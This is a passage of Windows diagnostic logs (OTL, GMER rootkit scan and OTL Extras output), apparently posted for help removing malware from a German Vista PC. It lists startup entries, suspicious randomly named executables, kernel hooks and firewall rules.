O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - No CLSID value found.
O2 - BHO: (ShowBarObj Class) - {83A2F9B1-01A2-4AA5-87D1-45B6B8505E96} - C:\Acer\Empowering Technology\eDataSecurity\x86\ActiveToolBand.dll (HiTRUST)
O2 - BHO: (Partner BHO Class) - {83FF80F4-8C74-4b80-B5BA-C8DDD434E5C4} - C:\ProgramData\Partner\partner.dll (Google Inc.)
O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
O2 - BHO: (Bing Bar Helper) - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
O3 - HKLM\..\Toolbar: (no name) - {0BF43445-2F28-4351-9252-17FE6E806AA0} - No CLSID value found.
O3 - HKLM\..\Toolbar: (Acer eDataSecurity Management) - {5CBE3B7C-1E47-477e-A7DD-396DB0476E29} - C:\Acer\Empowering Technology\eDataSecurity\x86\eDStoolbar.dll (Egis Incorporated.)
O3 - HKLM\..\Toolbar: (Bing Bar) - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
O3 - HKCU\..\Toolbar\ShellBrowser: (Acer eDataSecurity Management) - {5CBE3B7C-1E47-477E-A7DD-396DB0476E29} - C:\Acer\Empowering Technology\eDataSecurity\x86\eDStoolbar.dll (Egis Incorporated.)
O4 - HKLM..\Run: [] File not found
O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [avgnt] C:\Program Files\Avira\AntiVir Desktop\avgnt.exe (Avira Operations GmbH & Co. KG)
O4 - HKLM..\Run: [eRecoveryService] File not found
O4 - HKLM..\Run: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe (Malwarebytes Corporation)
O4 - HKLM..\Run: [Malwarebytes' Anti-Malware (reboot)] C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe (Malwarebytes Corporation)
O4 - HKLM..\Run: [NetDrive] C:\Program Files\NetDrive\NetDrive.exe (Bdrive Inc.)
O4 - HKLM..\Run: [SynTPStart] C:\Program Files\Synaptics\SynTP\SynTPStart.exe (Synaptics, Inc.)
O4 - HKCU..\Run: [GameXN GO] C:\ProgramData\GameXN\GameXNGO.exe (EasyBits Software AS)
O4 - HKCU..\Run: [Netdrive] C:\Program Files\NetDrive\netdrive.exe (Bdrive Inc.)
O4 - HKCU..\Run: [pejo] C:\Users\ant\AppData\Roaming\pejo\vifier.bat ()
O4 - Startup: C:\Users\ant\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ownCloud.lnk = C:\Program Files\ownCloud Client\owncloud.exe ()
O8 - Extra context menu item: Add to Google Photos Screensa&ver - C:\Windows\System32\GPhotos.scr (Google Inc.)
O8 - Extra context menu item: Google Sidewiki... - res://C:\Program Files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_950DF09FAB501E03.dll/cmsidewiki.html File not found
O10 - NameSpace_Catalog5\Catalog_Entries\000000000007 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O13 - gopher Prefix: missing
O15 - HKCU\..Trusted Domains: fritz.box ([]* in Lokales Intranet)
O15 - HKCU\..Trusted Ranges: Range1 ([*] in Lokales Intranet)
O16 - DPF: {34DC6011-88B5-4EA9-BA7A-DC7B4F4437FE} hxxp://photoservice.fujicolor.eu/ips-opdata/objects/jordan.cab (JordanUploader Class)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} hxxp://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab (Reg Error: Key error.)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.178.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{D6A7C132-CD4D-40B0-B557-D15BEBA0128B}: DhcpNameServer = 192.168.178.1
O18 - Protocol\Handler\livecall {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL File not found
O18 - Protocol\Handler\msnim {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL File not found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)
O24 - Desktop WallPaper: C:\Windows\Web\Wallpaper\img36.jpg
O24 - Desktop BackupWallPaper: C:\Windows\Web\Wallpaper\img36.jpg
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2006.09.18 23:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O33 - MountPoints2\{06099c25-89ca-11df-b824-001d722ce5cf}\Shell - "" = AutoRun
O33 - MountPoints2\{06099c25-89ca-11df-b824-001d722ce5cf}\Shell\AutoRun\command - "" = G:\USBAutoRun.exe
O33 - MountPoints2\{73e0bc52-f584-11df-848e-c5c0efcc5a54}\Shell - "" = AutoRun
O33 - MountPoints2\{73e0bc52-f584-11df-848e-c5c0efcc5a54}\Shell\AutoRun\command - "" = F:\Setup.exe
O33 - MountPoints2\{833a5916-e89a-11de-af94-806e6f6e6963}\Shell - "" = AutoRun
O33 - MountPoints2\{833a5916-e89a-11de-af94-806e6f6e6963}\Shell\AutoRun\command - "" = F:\LaunchU3.exe -a
O33 - MountPoints2\{9dbcd877-aaa6-11df-aff4-806e6f6e6963}\Shell\AutoRun\command - "" = F:\Menu.exe
O33 - MountPoints2\{d55ec516-5ea0-11df-a24c-806e6f6e6963}\Shell\AutoRun\command - "" = F:\Menu.exe
O33 - MountPoints2\F\Shell\AutoRun\command - "" = F:\Menu.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
========== Files/Folders - Created Within 30 Days ==========
[2013.06.02 17:02:09 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\ant\Desktop\OTL.exe
[2013.06.02 17:01:27 | 000,000,000 | ---D | C] -- C:\Users\ant\Desktop\virus tools
[2013.06.02 14:56:33 | 000,000,000 | ---D | C] -- C:\Users\ant\Desktop\logs
[2013.05.20 14:57:29 | 000,000,000 | ---D | C] -- C:\Users\ant\Desktop\Handy Backup
[2013.05.19 21:22:16 | 000,000,000 | ---D | C] -- C:\Users\ant\AppData\Roaming\pejo
[2013.05.15 20:53:08 | 000,000,000 | ---D | C] -- C:\Users\ant\AppData\Roaming\MyPhoneExplorer
[2013.05.15 20:53:04 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PriceGong
[2013.05.15 20:53:03 | 000,000,000 | ---D | C] -- C:\Program Files\PriceGong
[2013.05.15 20:53:03 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyPhoneExplorer
[2013.05.15 20:52:14 | 000,000,000 | ---D | C] -- C:\Program Files\MyPhoneExplorer
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
========== Files - Modified Within 30 Days ==========
[2013.06.02 17:11:17 | 000,001,094 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2013.06.02 17:11:09 | 000,003,616 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
[2013.06.02 17:11:09 | 000,003,616 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
[2013.06.02 17:10:55 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2013.06.02 17:10:49 | 3219,243,008 | -HS- | M] () -- C:\hiberfil.sys
[2013.06.02 17:09:39 | 000,000,020 | ---- | M] () -- C:\Users\ant\defogger_reenable
[2013.06.02 17:07:05 | 000,050,477 | ---- | M] () -- C:\Users\ant\Desktop\Defogger.exe
[2013.06.02 17:06:01 | 000,001,098 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2013.06.02 17:02:10 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ant\Desktop\OTL.exe
[2013.06.02 16:58:00 | 000,000,884 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2013.06.02 16:49:01 | 000,628,992 | ---- | M] () -- C:\Windows\System32\perfh007.dat
[2013.06.02 16:49:01 | 000,596,246 | ---- | M] () -- C:\Windows\System32\perfh009.dat
[2013.06.02 16:49:01 | 000,126,704 | ---- | M] () -- C:\Windows\System32\perfc007.dat
[2013.06.02 16:49:01 | 000,104,320 | ---- | M] () -- C:\Windows\System32\perfc009.dat
[2013.05.19 21:30:31 | 000,600,389 | ---- | M] () -- C:\Users\ant\5rfakc72togyi.exe
[2013.05.19 21:29:30 | 000,600,389 | ---- | M] () -- C:\Users\ant\5pyizgdrc5biy.exe
[2013.05.19 21:29:11 | 000,600,389 | ---- | M] () -- C:\Users\ant\q8x93h4akie10.exe
[2013.05.19 21:22:15 | 000,600,389 | ---- | M] () -- C:\Users\ant\9gghzlvklvp08.exe
[2013.05.19 09:30:23 | 000,001,851 | ---- | M] () -- C:\Users\Public\Desktop\Adobe Reader 9.lnk
[2013.05.18 22:43:51 | 000,411,192 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT
[2013.05.15 20:53:04 | 000,001,818 | ---- | M] () -- C:\Users\Public\Desktop\MyPhoneExplorer.lnk
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
========== Files Created - No Company Name ==========
[2013.06.02 17:09:24 | 000,000,020 | ---- | C] () -- C:\Users\ant\defogger_reenable
[2013.06.02 17:01:36 | 000,050,477 | ---- | C] () -- C:\Users\ant\Desktop\Defogger.exe
[2013.05.19 21:30:31 | 000,600,389 | ---- | C] () -- C:\Users\ant\5rfakc72togyi.exe
[2013.05.19 21:29:30 | 000,600,389 | ---- | C] () -- C:\Users\ant\5pyizgdrc5biy.exe
[2013.05.19 21:29:11 | 000,600,389 | ---- | C] () -- C:\Users\ant\q8x93h4akie10.exe
[2013.05.19 21:22:15 | 000,600,389 | ---- | C] () -- C:\Users\ant\9gghzlvklvp08.exe
[2013.05.15 20:53:04 | 000,001,818 | ---- | C] () -- C:\Users\Public\Desktop\MyPhoneExplorer.lnk
[2011.11.26 23:51:28 | 000,175,616 | ---- | C] () -- C:\Windows\System32\unrar.dll
[2011.11.26 23:51:26 | 000,650,752 | ---- | C] () -- C:\Windows\System32\xvidcore.dll
[2011.11.26 23:51:26 | 000,243,200 | ---- | C] () -- C:\Windows\System32\xvidvfw.dll
[2011.11.26 23:51:25 | 000,074,752 | ---- | C] () -- C:\Windows\System32\ff_vfw.dll
[2011.06.15 18:08:12 | 000,001,024 | ---- | C] () -- C:\Users\ant\.rnd
[2011.06.06 20:26:34 | 000,000,000 | ---- | C] () -- C:\Users\ant\AppData\Local\{5336EE4C-60E1-417C-926F-ED072C3704C0}
[2010.11.21 17:44:27 | 000,000,173 | -HS- | C] () -- C:\ProgramData\.zreglib
[2010.06.28 14:39:01 | 000,000,680 | ---- | C] () -- C:\Users\ant\AppData\Local\d3d9caps.dat
[2010.03.14 20:06:58 | 000,000,056 | -H-- | C] () -- C:\ProgramData\ezsidmv.dat
[2009.05.18 23:08:39 | 000,249,344 | ---- | C] () -- C:\Users\ant\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
========== ZeroAccess Check ==========
[2006.11.02 14:54:22 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2012.06.08 19:47:00 | 011,586,048 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009.04.11 08:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2009.04.11 08:28:25 | 000,347,648 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
========== LOP Check ==========
[2012.09.04 20:37:49 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\Cornelsen
[2010.11.21 17:37:15 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\DAEMON Tools Lite
[2009.11.09 14:21:11 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\ESET
[2009.05.19 21:40:19 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\fotobuch.de AG
[2009.11.09 14:20:41 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\FRITZ!
[2013.06.02 16:02:11 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\go
[2013.05.15 20:53:08 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\MyPhoneExplorer
[2012.09.28 23:31:15 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\NetDrive
[2009.05.18 23:02:36 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\OpenOffice.org
[2013.06.02 14:56:57 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\pejo
[2009.08.24 23:59:34 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\schroedelarbeitblaetter
[2010.11.21 17:44:36 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\SlySoft
[2009.11.09 13:44:20 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\Thunderbird
[2011.12.09 22:04:13 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\Trine2
[2012.12.25 23:04:09 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\TwonkyMedia
[2012.12.25 22:33:06 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\TwonkyServer
========== Purity Check ==========
< End of report >
gmer.txt Code:
GMER 2.1.19163 - hxxp://www.gmer.net
Rootkit scan 2013-06-02 22:26:27
Windows 6.0.6002 Service Pack 2 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0 WDC_WD2500BEVS-22UST0 rev.01.01A01 232,89GB
Running: gmer_2.1.19163.exe; Driver: C:\Users\ant\AppData\Local\Temp\kxtdrpow.sys
---- System - GMER 2.1 ----
SSDT 8C930A46 ZwCreateSection
SSDT 8C930A50 ZwRequestWaitReplyPort
SSDT 8C930A4B ZwSetContextThread
SSDT 8C930A55 ZwSetSecurityObject
SSDT 8C930A5A ZwSystemDebugControl
SSDT 8C9309E7 ZwTerminateProcess
---- Kernel code sections - GMER 2.1 ----
.text ntkrnlpa.exe!KeSetEvent + 215 826E9958 4 Bytes [46, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 539 826E9C7C 4 Bytes [50, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 56D 826E9CB0 4 Bytes [4B, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 5D1 826E9D14 4 Bytes [55, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 619 826E9D5C 4 Bytes [5A, 0A, 93, 8C]
.text ...
.text C:\Windows\system32\DRIVERS\atikmdag.sys section is writeable [0x8E408000, 0x1F875A, 0xE8000020]
---- User code sections - GMER 2.1 ----
.text C:\Windows\Explorer.EXE[3140] SHELL32.dll!SHGetFolderPathAndSubDirW + 81C5 7602B37C 4 Bytes [F0, 1F, 00, 10] {POP DS; ADD [EAX], DL}
.text C:\Windows\Explorer.EXE[3140] SHELL32.dll!ShellExecuteExW + 18B7 7605DA14 4 Bytes [40, 1D, 00, 10]
---- Devices - GMER 2.1 ----
AttachedDevice \Driver\kbdclass \Device\KeyboardClass0 Wdf01000.sys
AttachedDevice \Driver\kbdclass \Device\KeyboardClass1 Wdf01000.sys
AttachedDevice \FileSystem\fastfat \Fat fltmgr.sys
---- Registry - GMER 2.1 ----
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@p0 C:\Program Files\DAEMON Tools Lite\
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@u0 0x00 0x00 0x00 0x00 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@h0 0
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@hdf12 0xC2 0x76 0xBB 0x58 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@a0 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@hdf12 0x58 0xB3 0xDD 0x04 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0@hdf12 0x0A 0x52 0xF8 0x64 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@p0 C:\Program Files\DAEMON Tools Lite\
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@u0 0x00 0x00 0x00 0x00 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@h0 0
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@hdf12 0xC2 0x76 0xBB 0x58 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001 (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@a0 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@hdf12 0x58 0xB3 0xDD 0x04 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0 (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0@hdf12 0x0A 0x52 0xF8 0x64 ...
---- Disk sectors - GMER 2.1 ----
Disk \Device\Harddisk0\DR0 unknown MBR code
---- EOF - GMER 2.1 ----
Extras.txt: Code:
OTL Extras logfile created on: 02.06.2013 17:24:00 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ant\Desktop
Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
3,00 Gb Total Physical Memory | 1,99 Gb Available Physical Memory | 66,28% Memory free
6,19 Gb Paging File | 5,21 Gb Available in Paging File | 84,05% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 111,57 Gb Total Space | 15,15 Gb Free Space | 13,58% Space Free | Partition Type: NTFS
Drive D: | 111,55 Gb Total Space | 35,46 Gb Free Space | 31,79% Space Free | Partition Type: NTFS
Drive G: | 1,86 Gb Total Space | 0,02 Gb Free Space | 1,00% Space Free | Partition Type: FAT
Computer Name: ANT-PC | User Name: ant | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
========== Extra Registry (SafeList) ==========
========== File Associations ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\System32\control.exe (Microsoft Corporation)
.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)
.html [@ = ChromeHTML] -- C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.)
[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found
========== Shell Spawning ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
https [open] -- "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" ()
Directory [CEWE FOTOSCHAU] -- "C:\Program Files\SCHLECKER\SCHLECKER Foto Digital Service\CEWE FOTOSCHAU.exe" -d "%1"
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" ()
Directory [SCHLECKER Foto Digital Service] -- "C:\Program Files\SCHLECKER\SCHLECKER Foto Digital Service\SCHLECKER Foto Digital Service.exe" "%1"
Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
========== Security Center Settings ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring" = 1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
"VistaSp1" = Reg Error: Unknown registry data type -- File not found
"VistaSp2" = Reg Error: Unknown registry data type -- File not found
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
========== Firewall Settings ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
========== Authorized Applications List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files\fotobuch.de AG\Designer 2.0\Designer.exe" = C:\Program Files\fotobuch.de AG\Designer 2.0\Designer.exe:*:Designer.exe
========== Vista Active Open Ports Exception List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{01BAB6FB-2EE8-4338-ADD0-C0CED0CDA14B}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=c:\windows\system32\svchost.exe |
"{02A763CC-D826-4FF2-A962-1E02A0F68C4A}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{04BDF624-7EAE-4065-9209-8BFA933D833B}" = lport=3702 | protocol=17 | dir=in | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{16CE6FD6-ACC3-4E6B-B5F8-465477CF0CA9}" = lport=2869 | protocol=6 | dir=in | app=system |
"{21565775-D419-44F2-BD2F-BE2C95BB9FD3}" = rport=445 | protocol=6 | dir=out | app=system |
"{525B6120-2283-4102-8418-1676D0E8F53A}" = rport=137 | protocol=17 | dir=out | app=system |
"{5D154A06-48C6-4B76-AE70-0C242389F7A6}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=svchost.exe |
"{5D4EEFAB-5D5B-42D4-8004-EEC11C0E38E0}" = lport=427 | protocol=17 | dir=in | name=druckvorgang |
"{6092F5AB-197D-42F3-9576-7269713779C5}" = lport=137 | protocol=17 | dir=in | name=druckvorgang |
"{63F62E60-2FC5-424D-9AE1-C634204CB5DB}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |
"{71F4296E-2DB3-4D6E-8FB9-23ACF99E6072}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{7469BC45-FD5D-4F16-8201-5B67ABFA03EF}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{7D09AC59-3128-489C-B1F0-F90CCBED92AE}" = lport=445 | protocol=6 | dir=in | app=system |
"{7E6B0420-F79A-44FF-8424-6FA970ACC849}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=c:\windows\system32\svchost.exe |
"{8F3EDFD5-44CA-4C46-80F6-42BD7EDEA80D}" = lport=3702 | protocol=17 | dir=in | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{903D317E-BC5C-42C6-A3CA-5A837F68D22B}" = rport=138 | protocol=17 | dir=out | app=system |
"{9D62E869-2D8D-4B0C-B1E6-19666E027646}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{B4E6989F-428F-4223-884F-1724940DA61A}" = rport=139 | protocol=6 | dir=out | app=system |
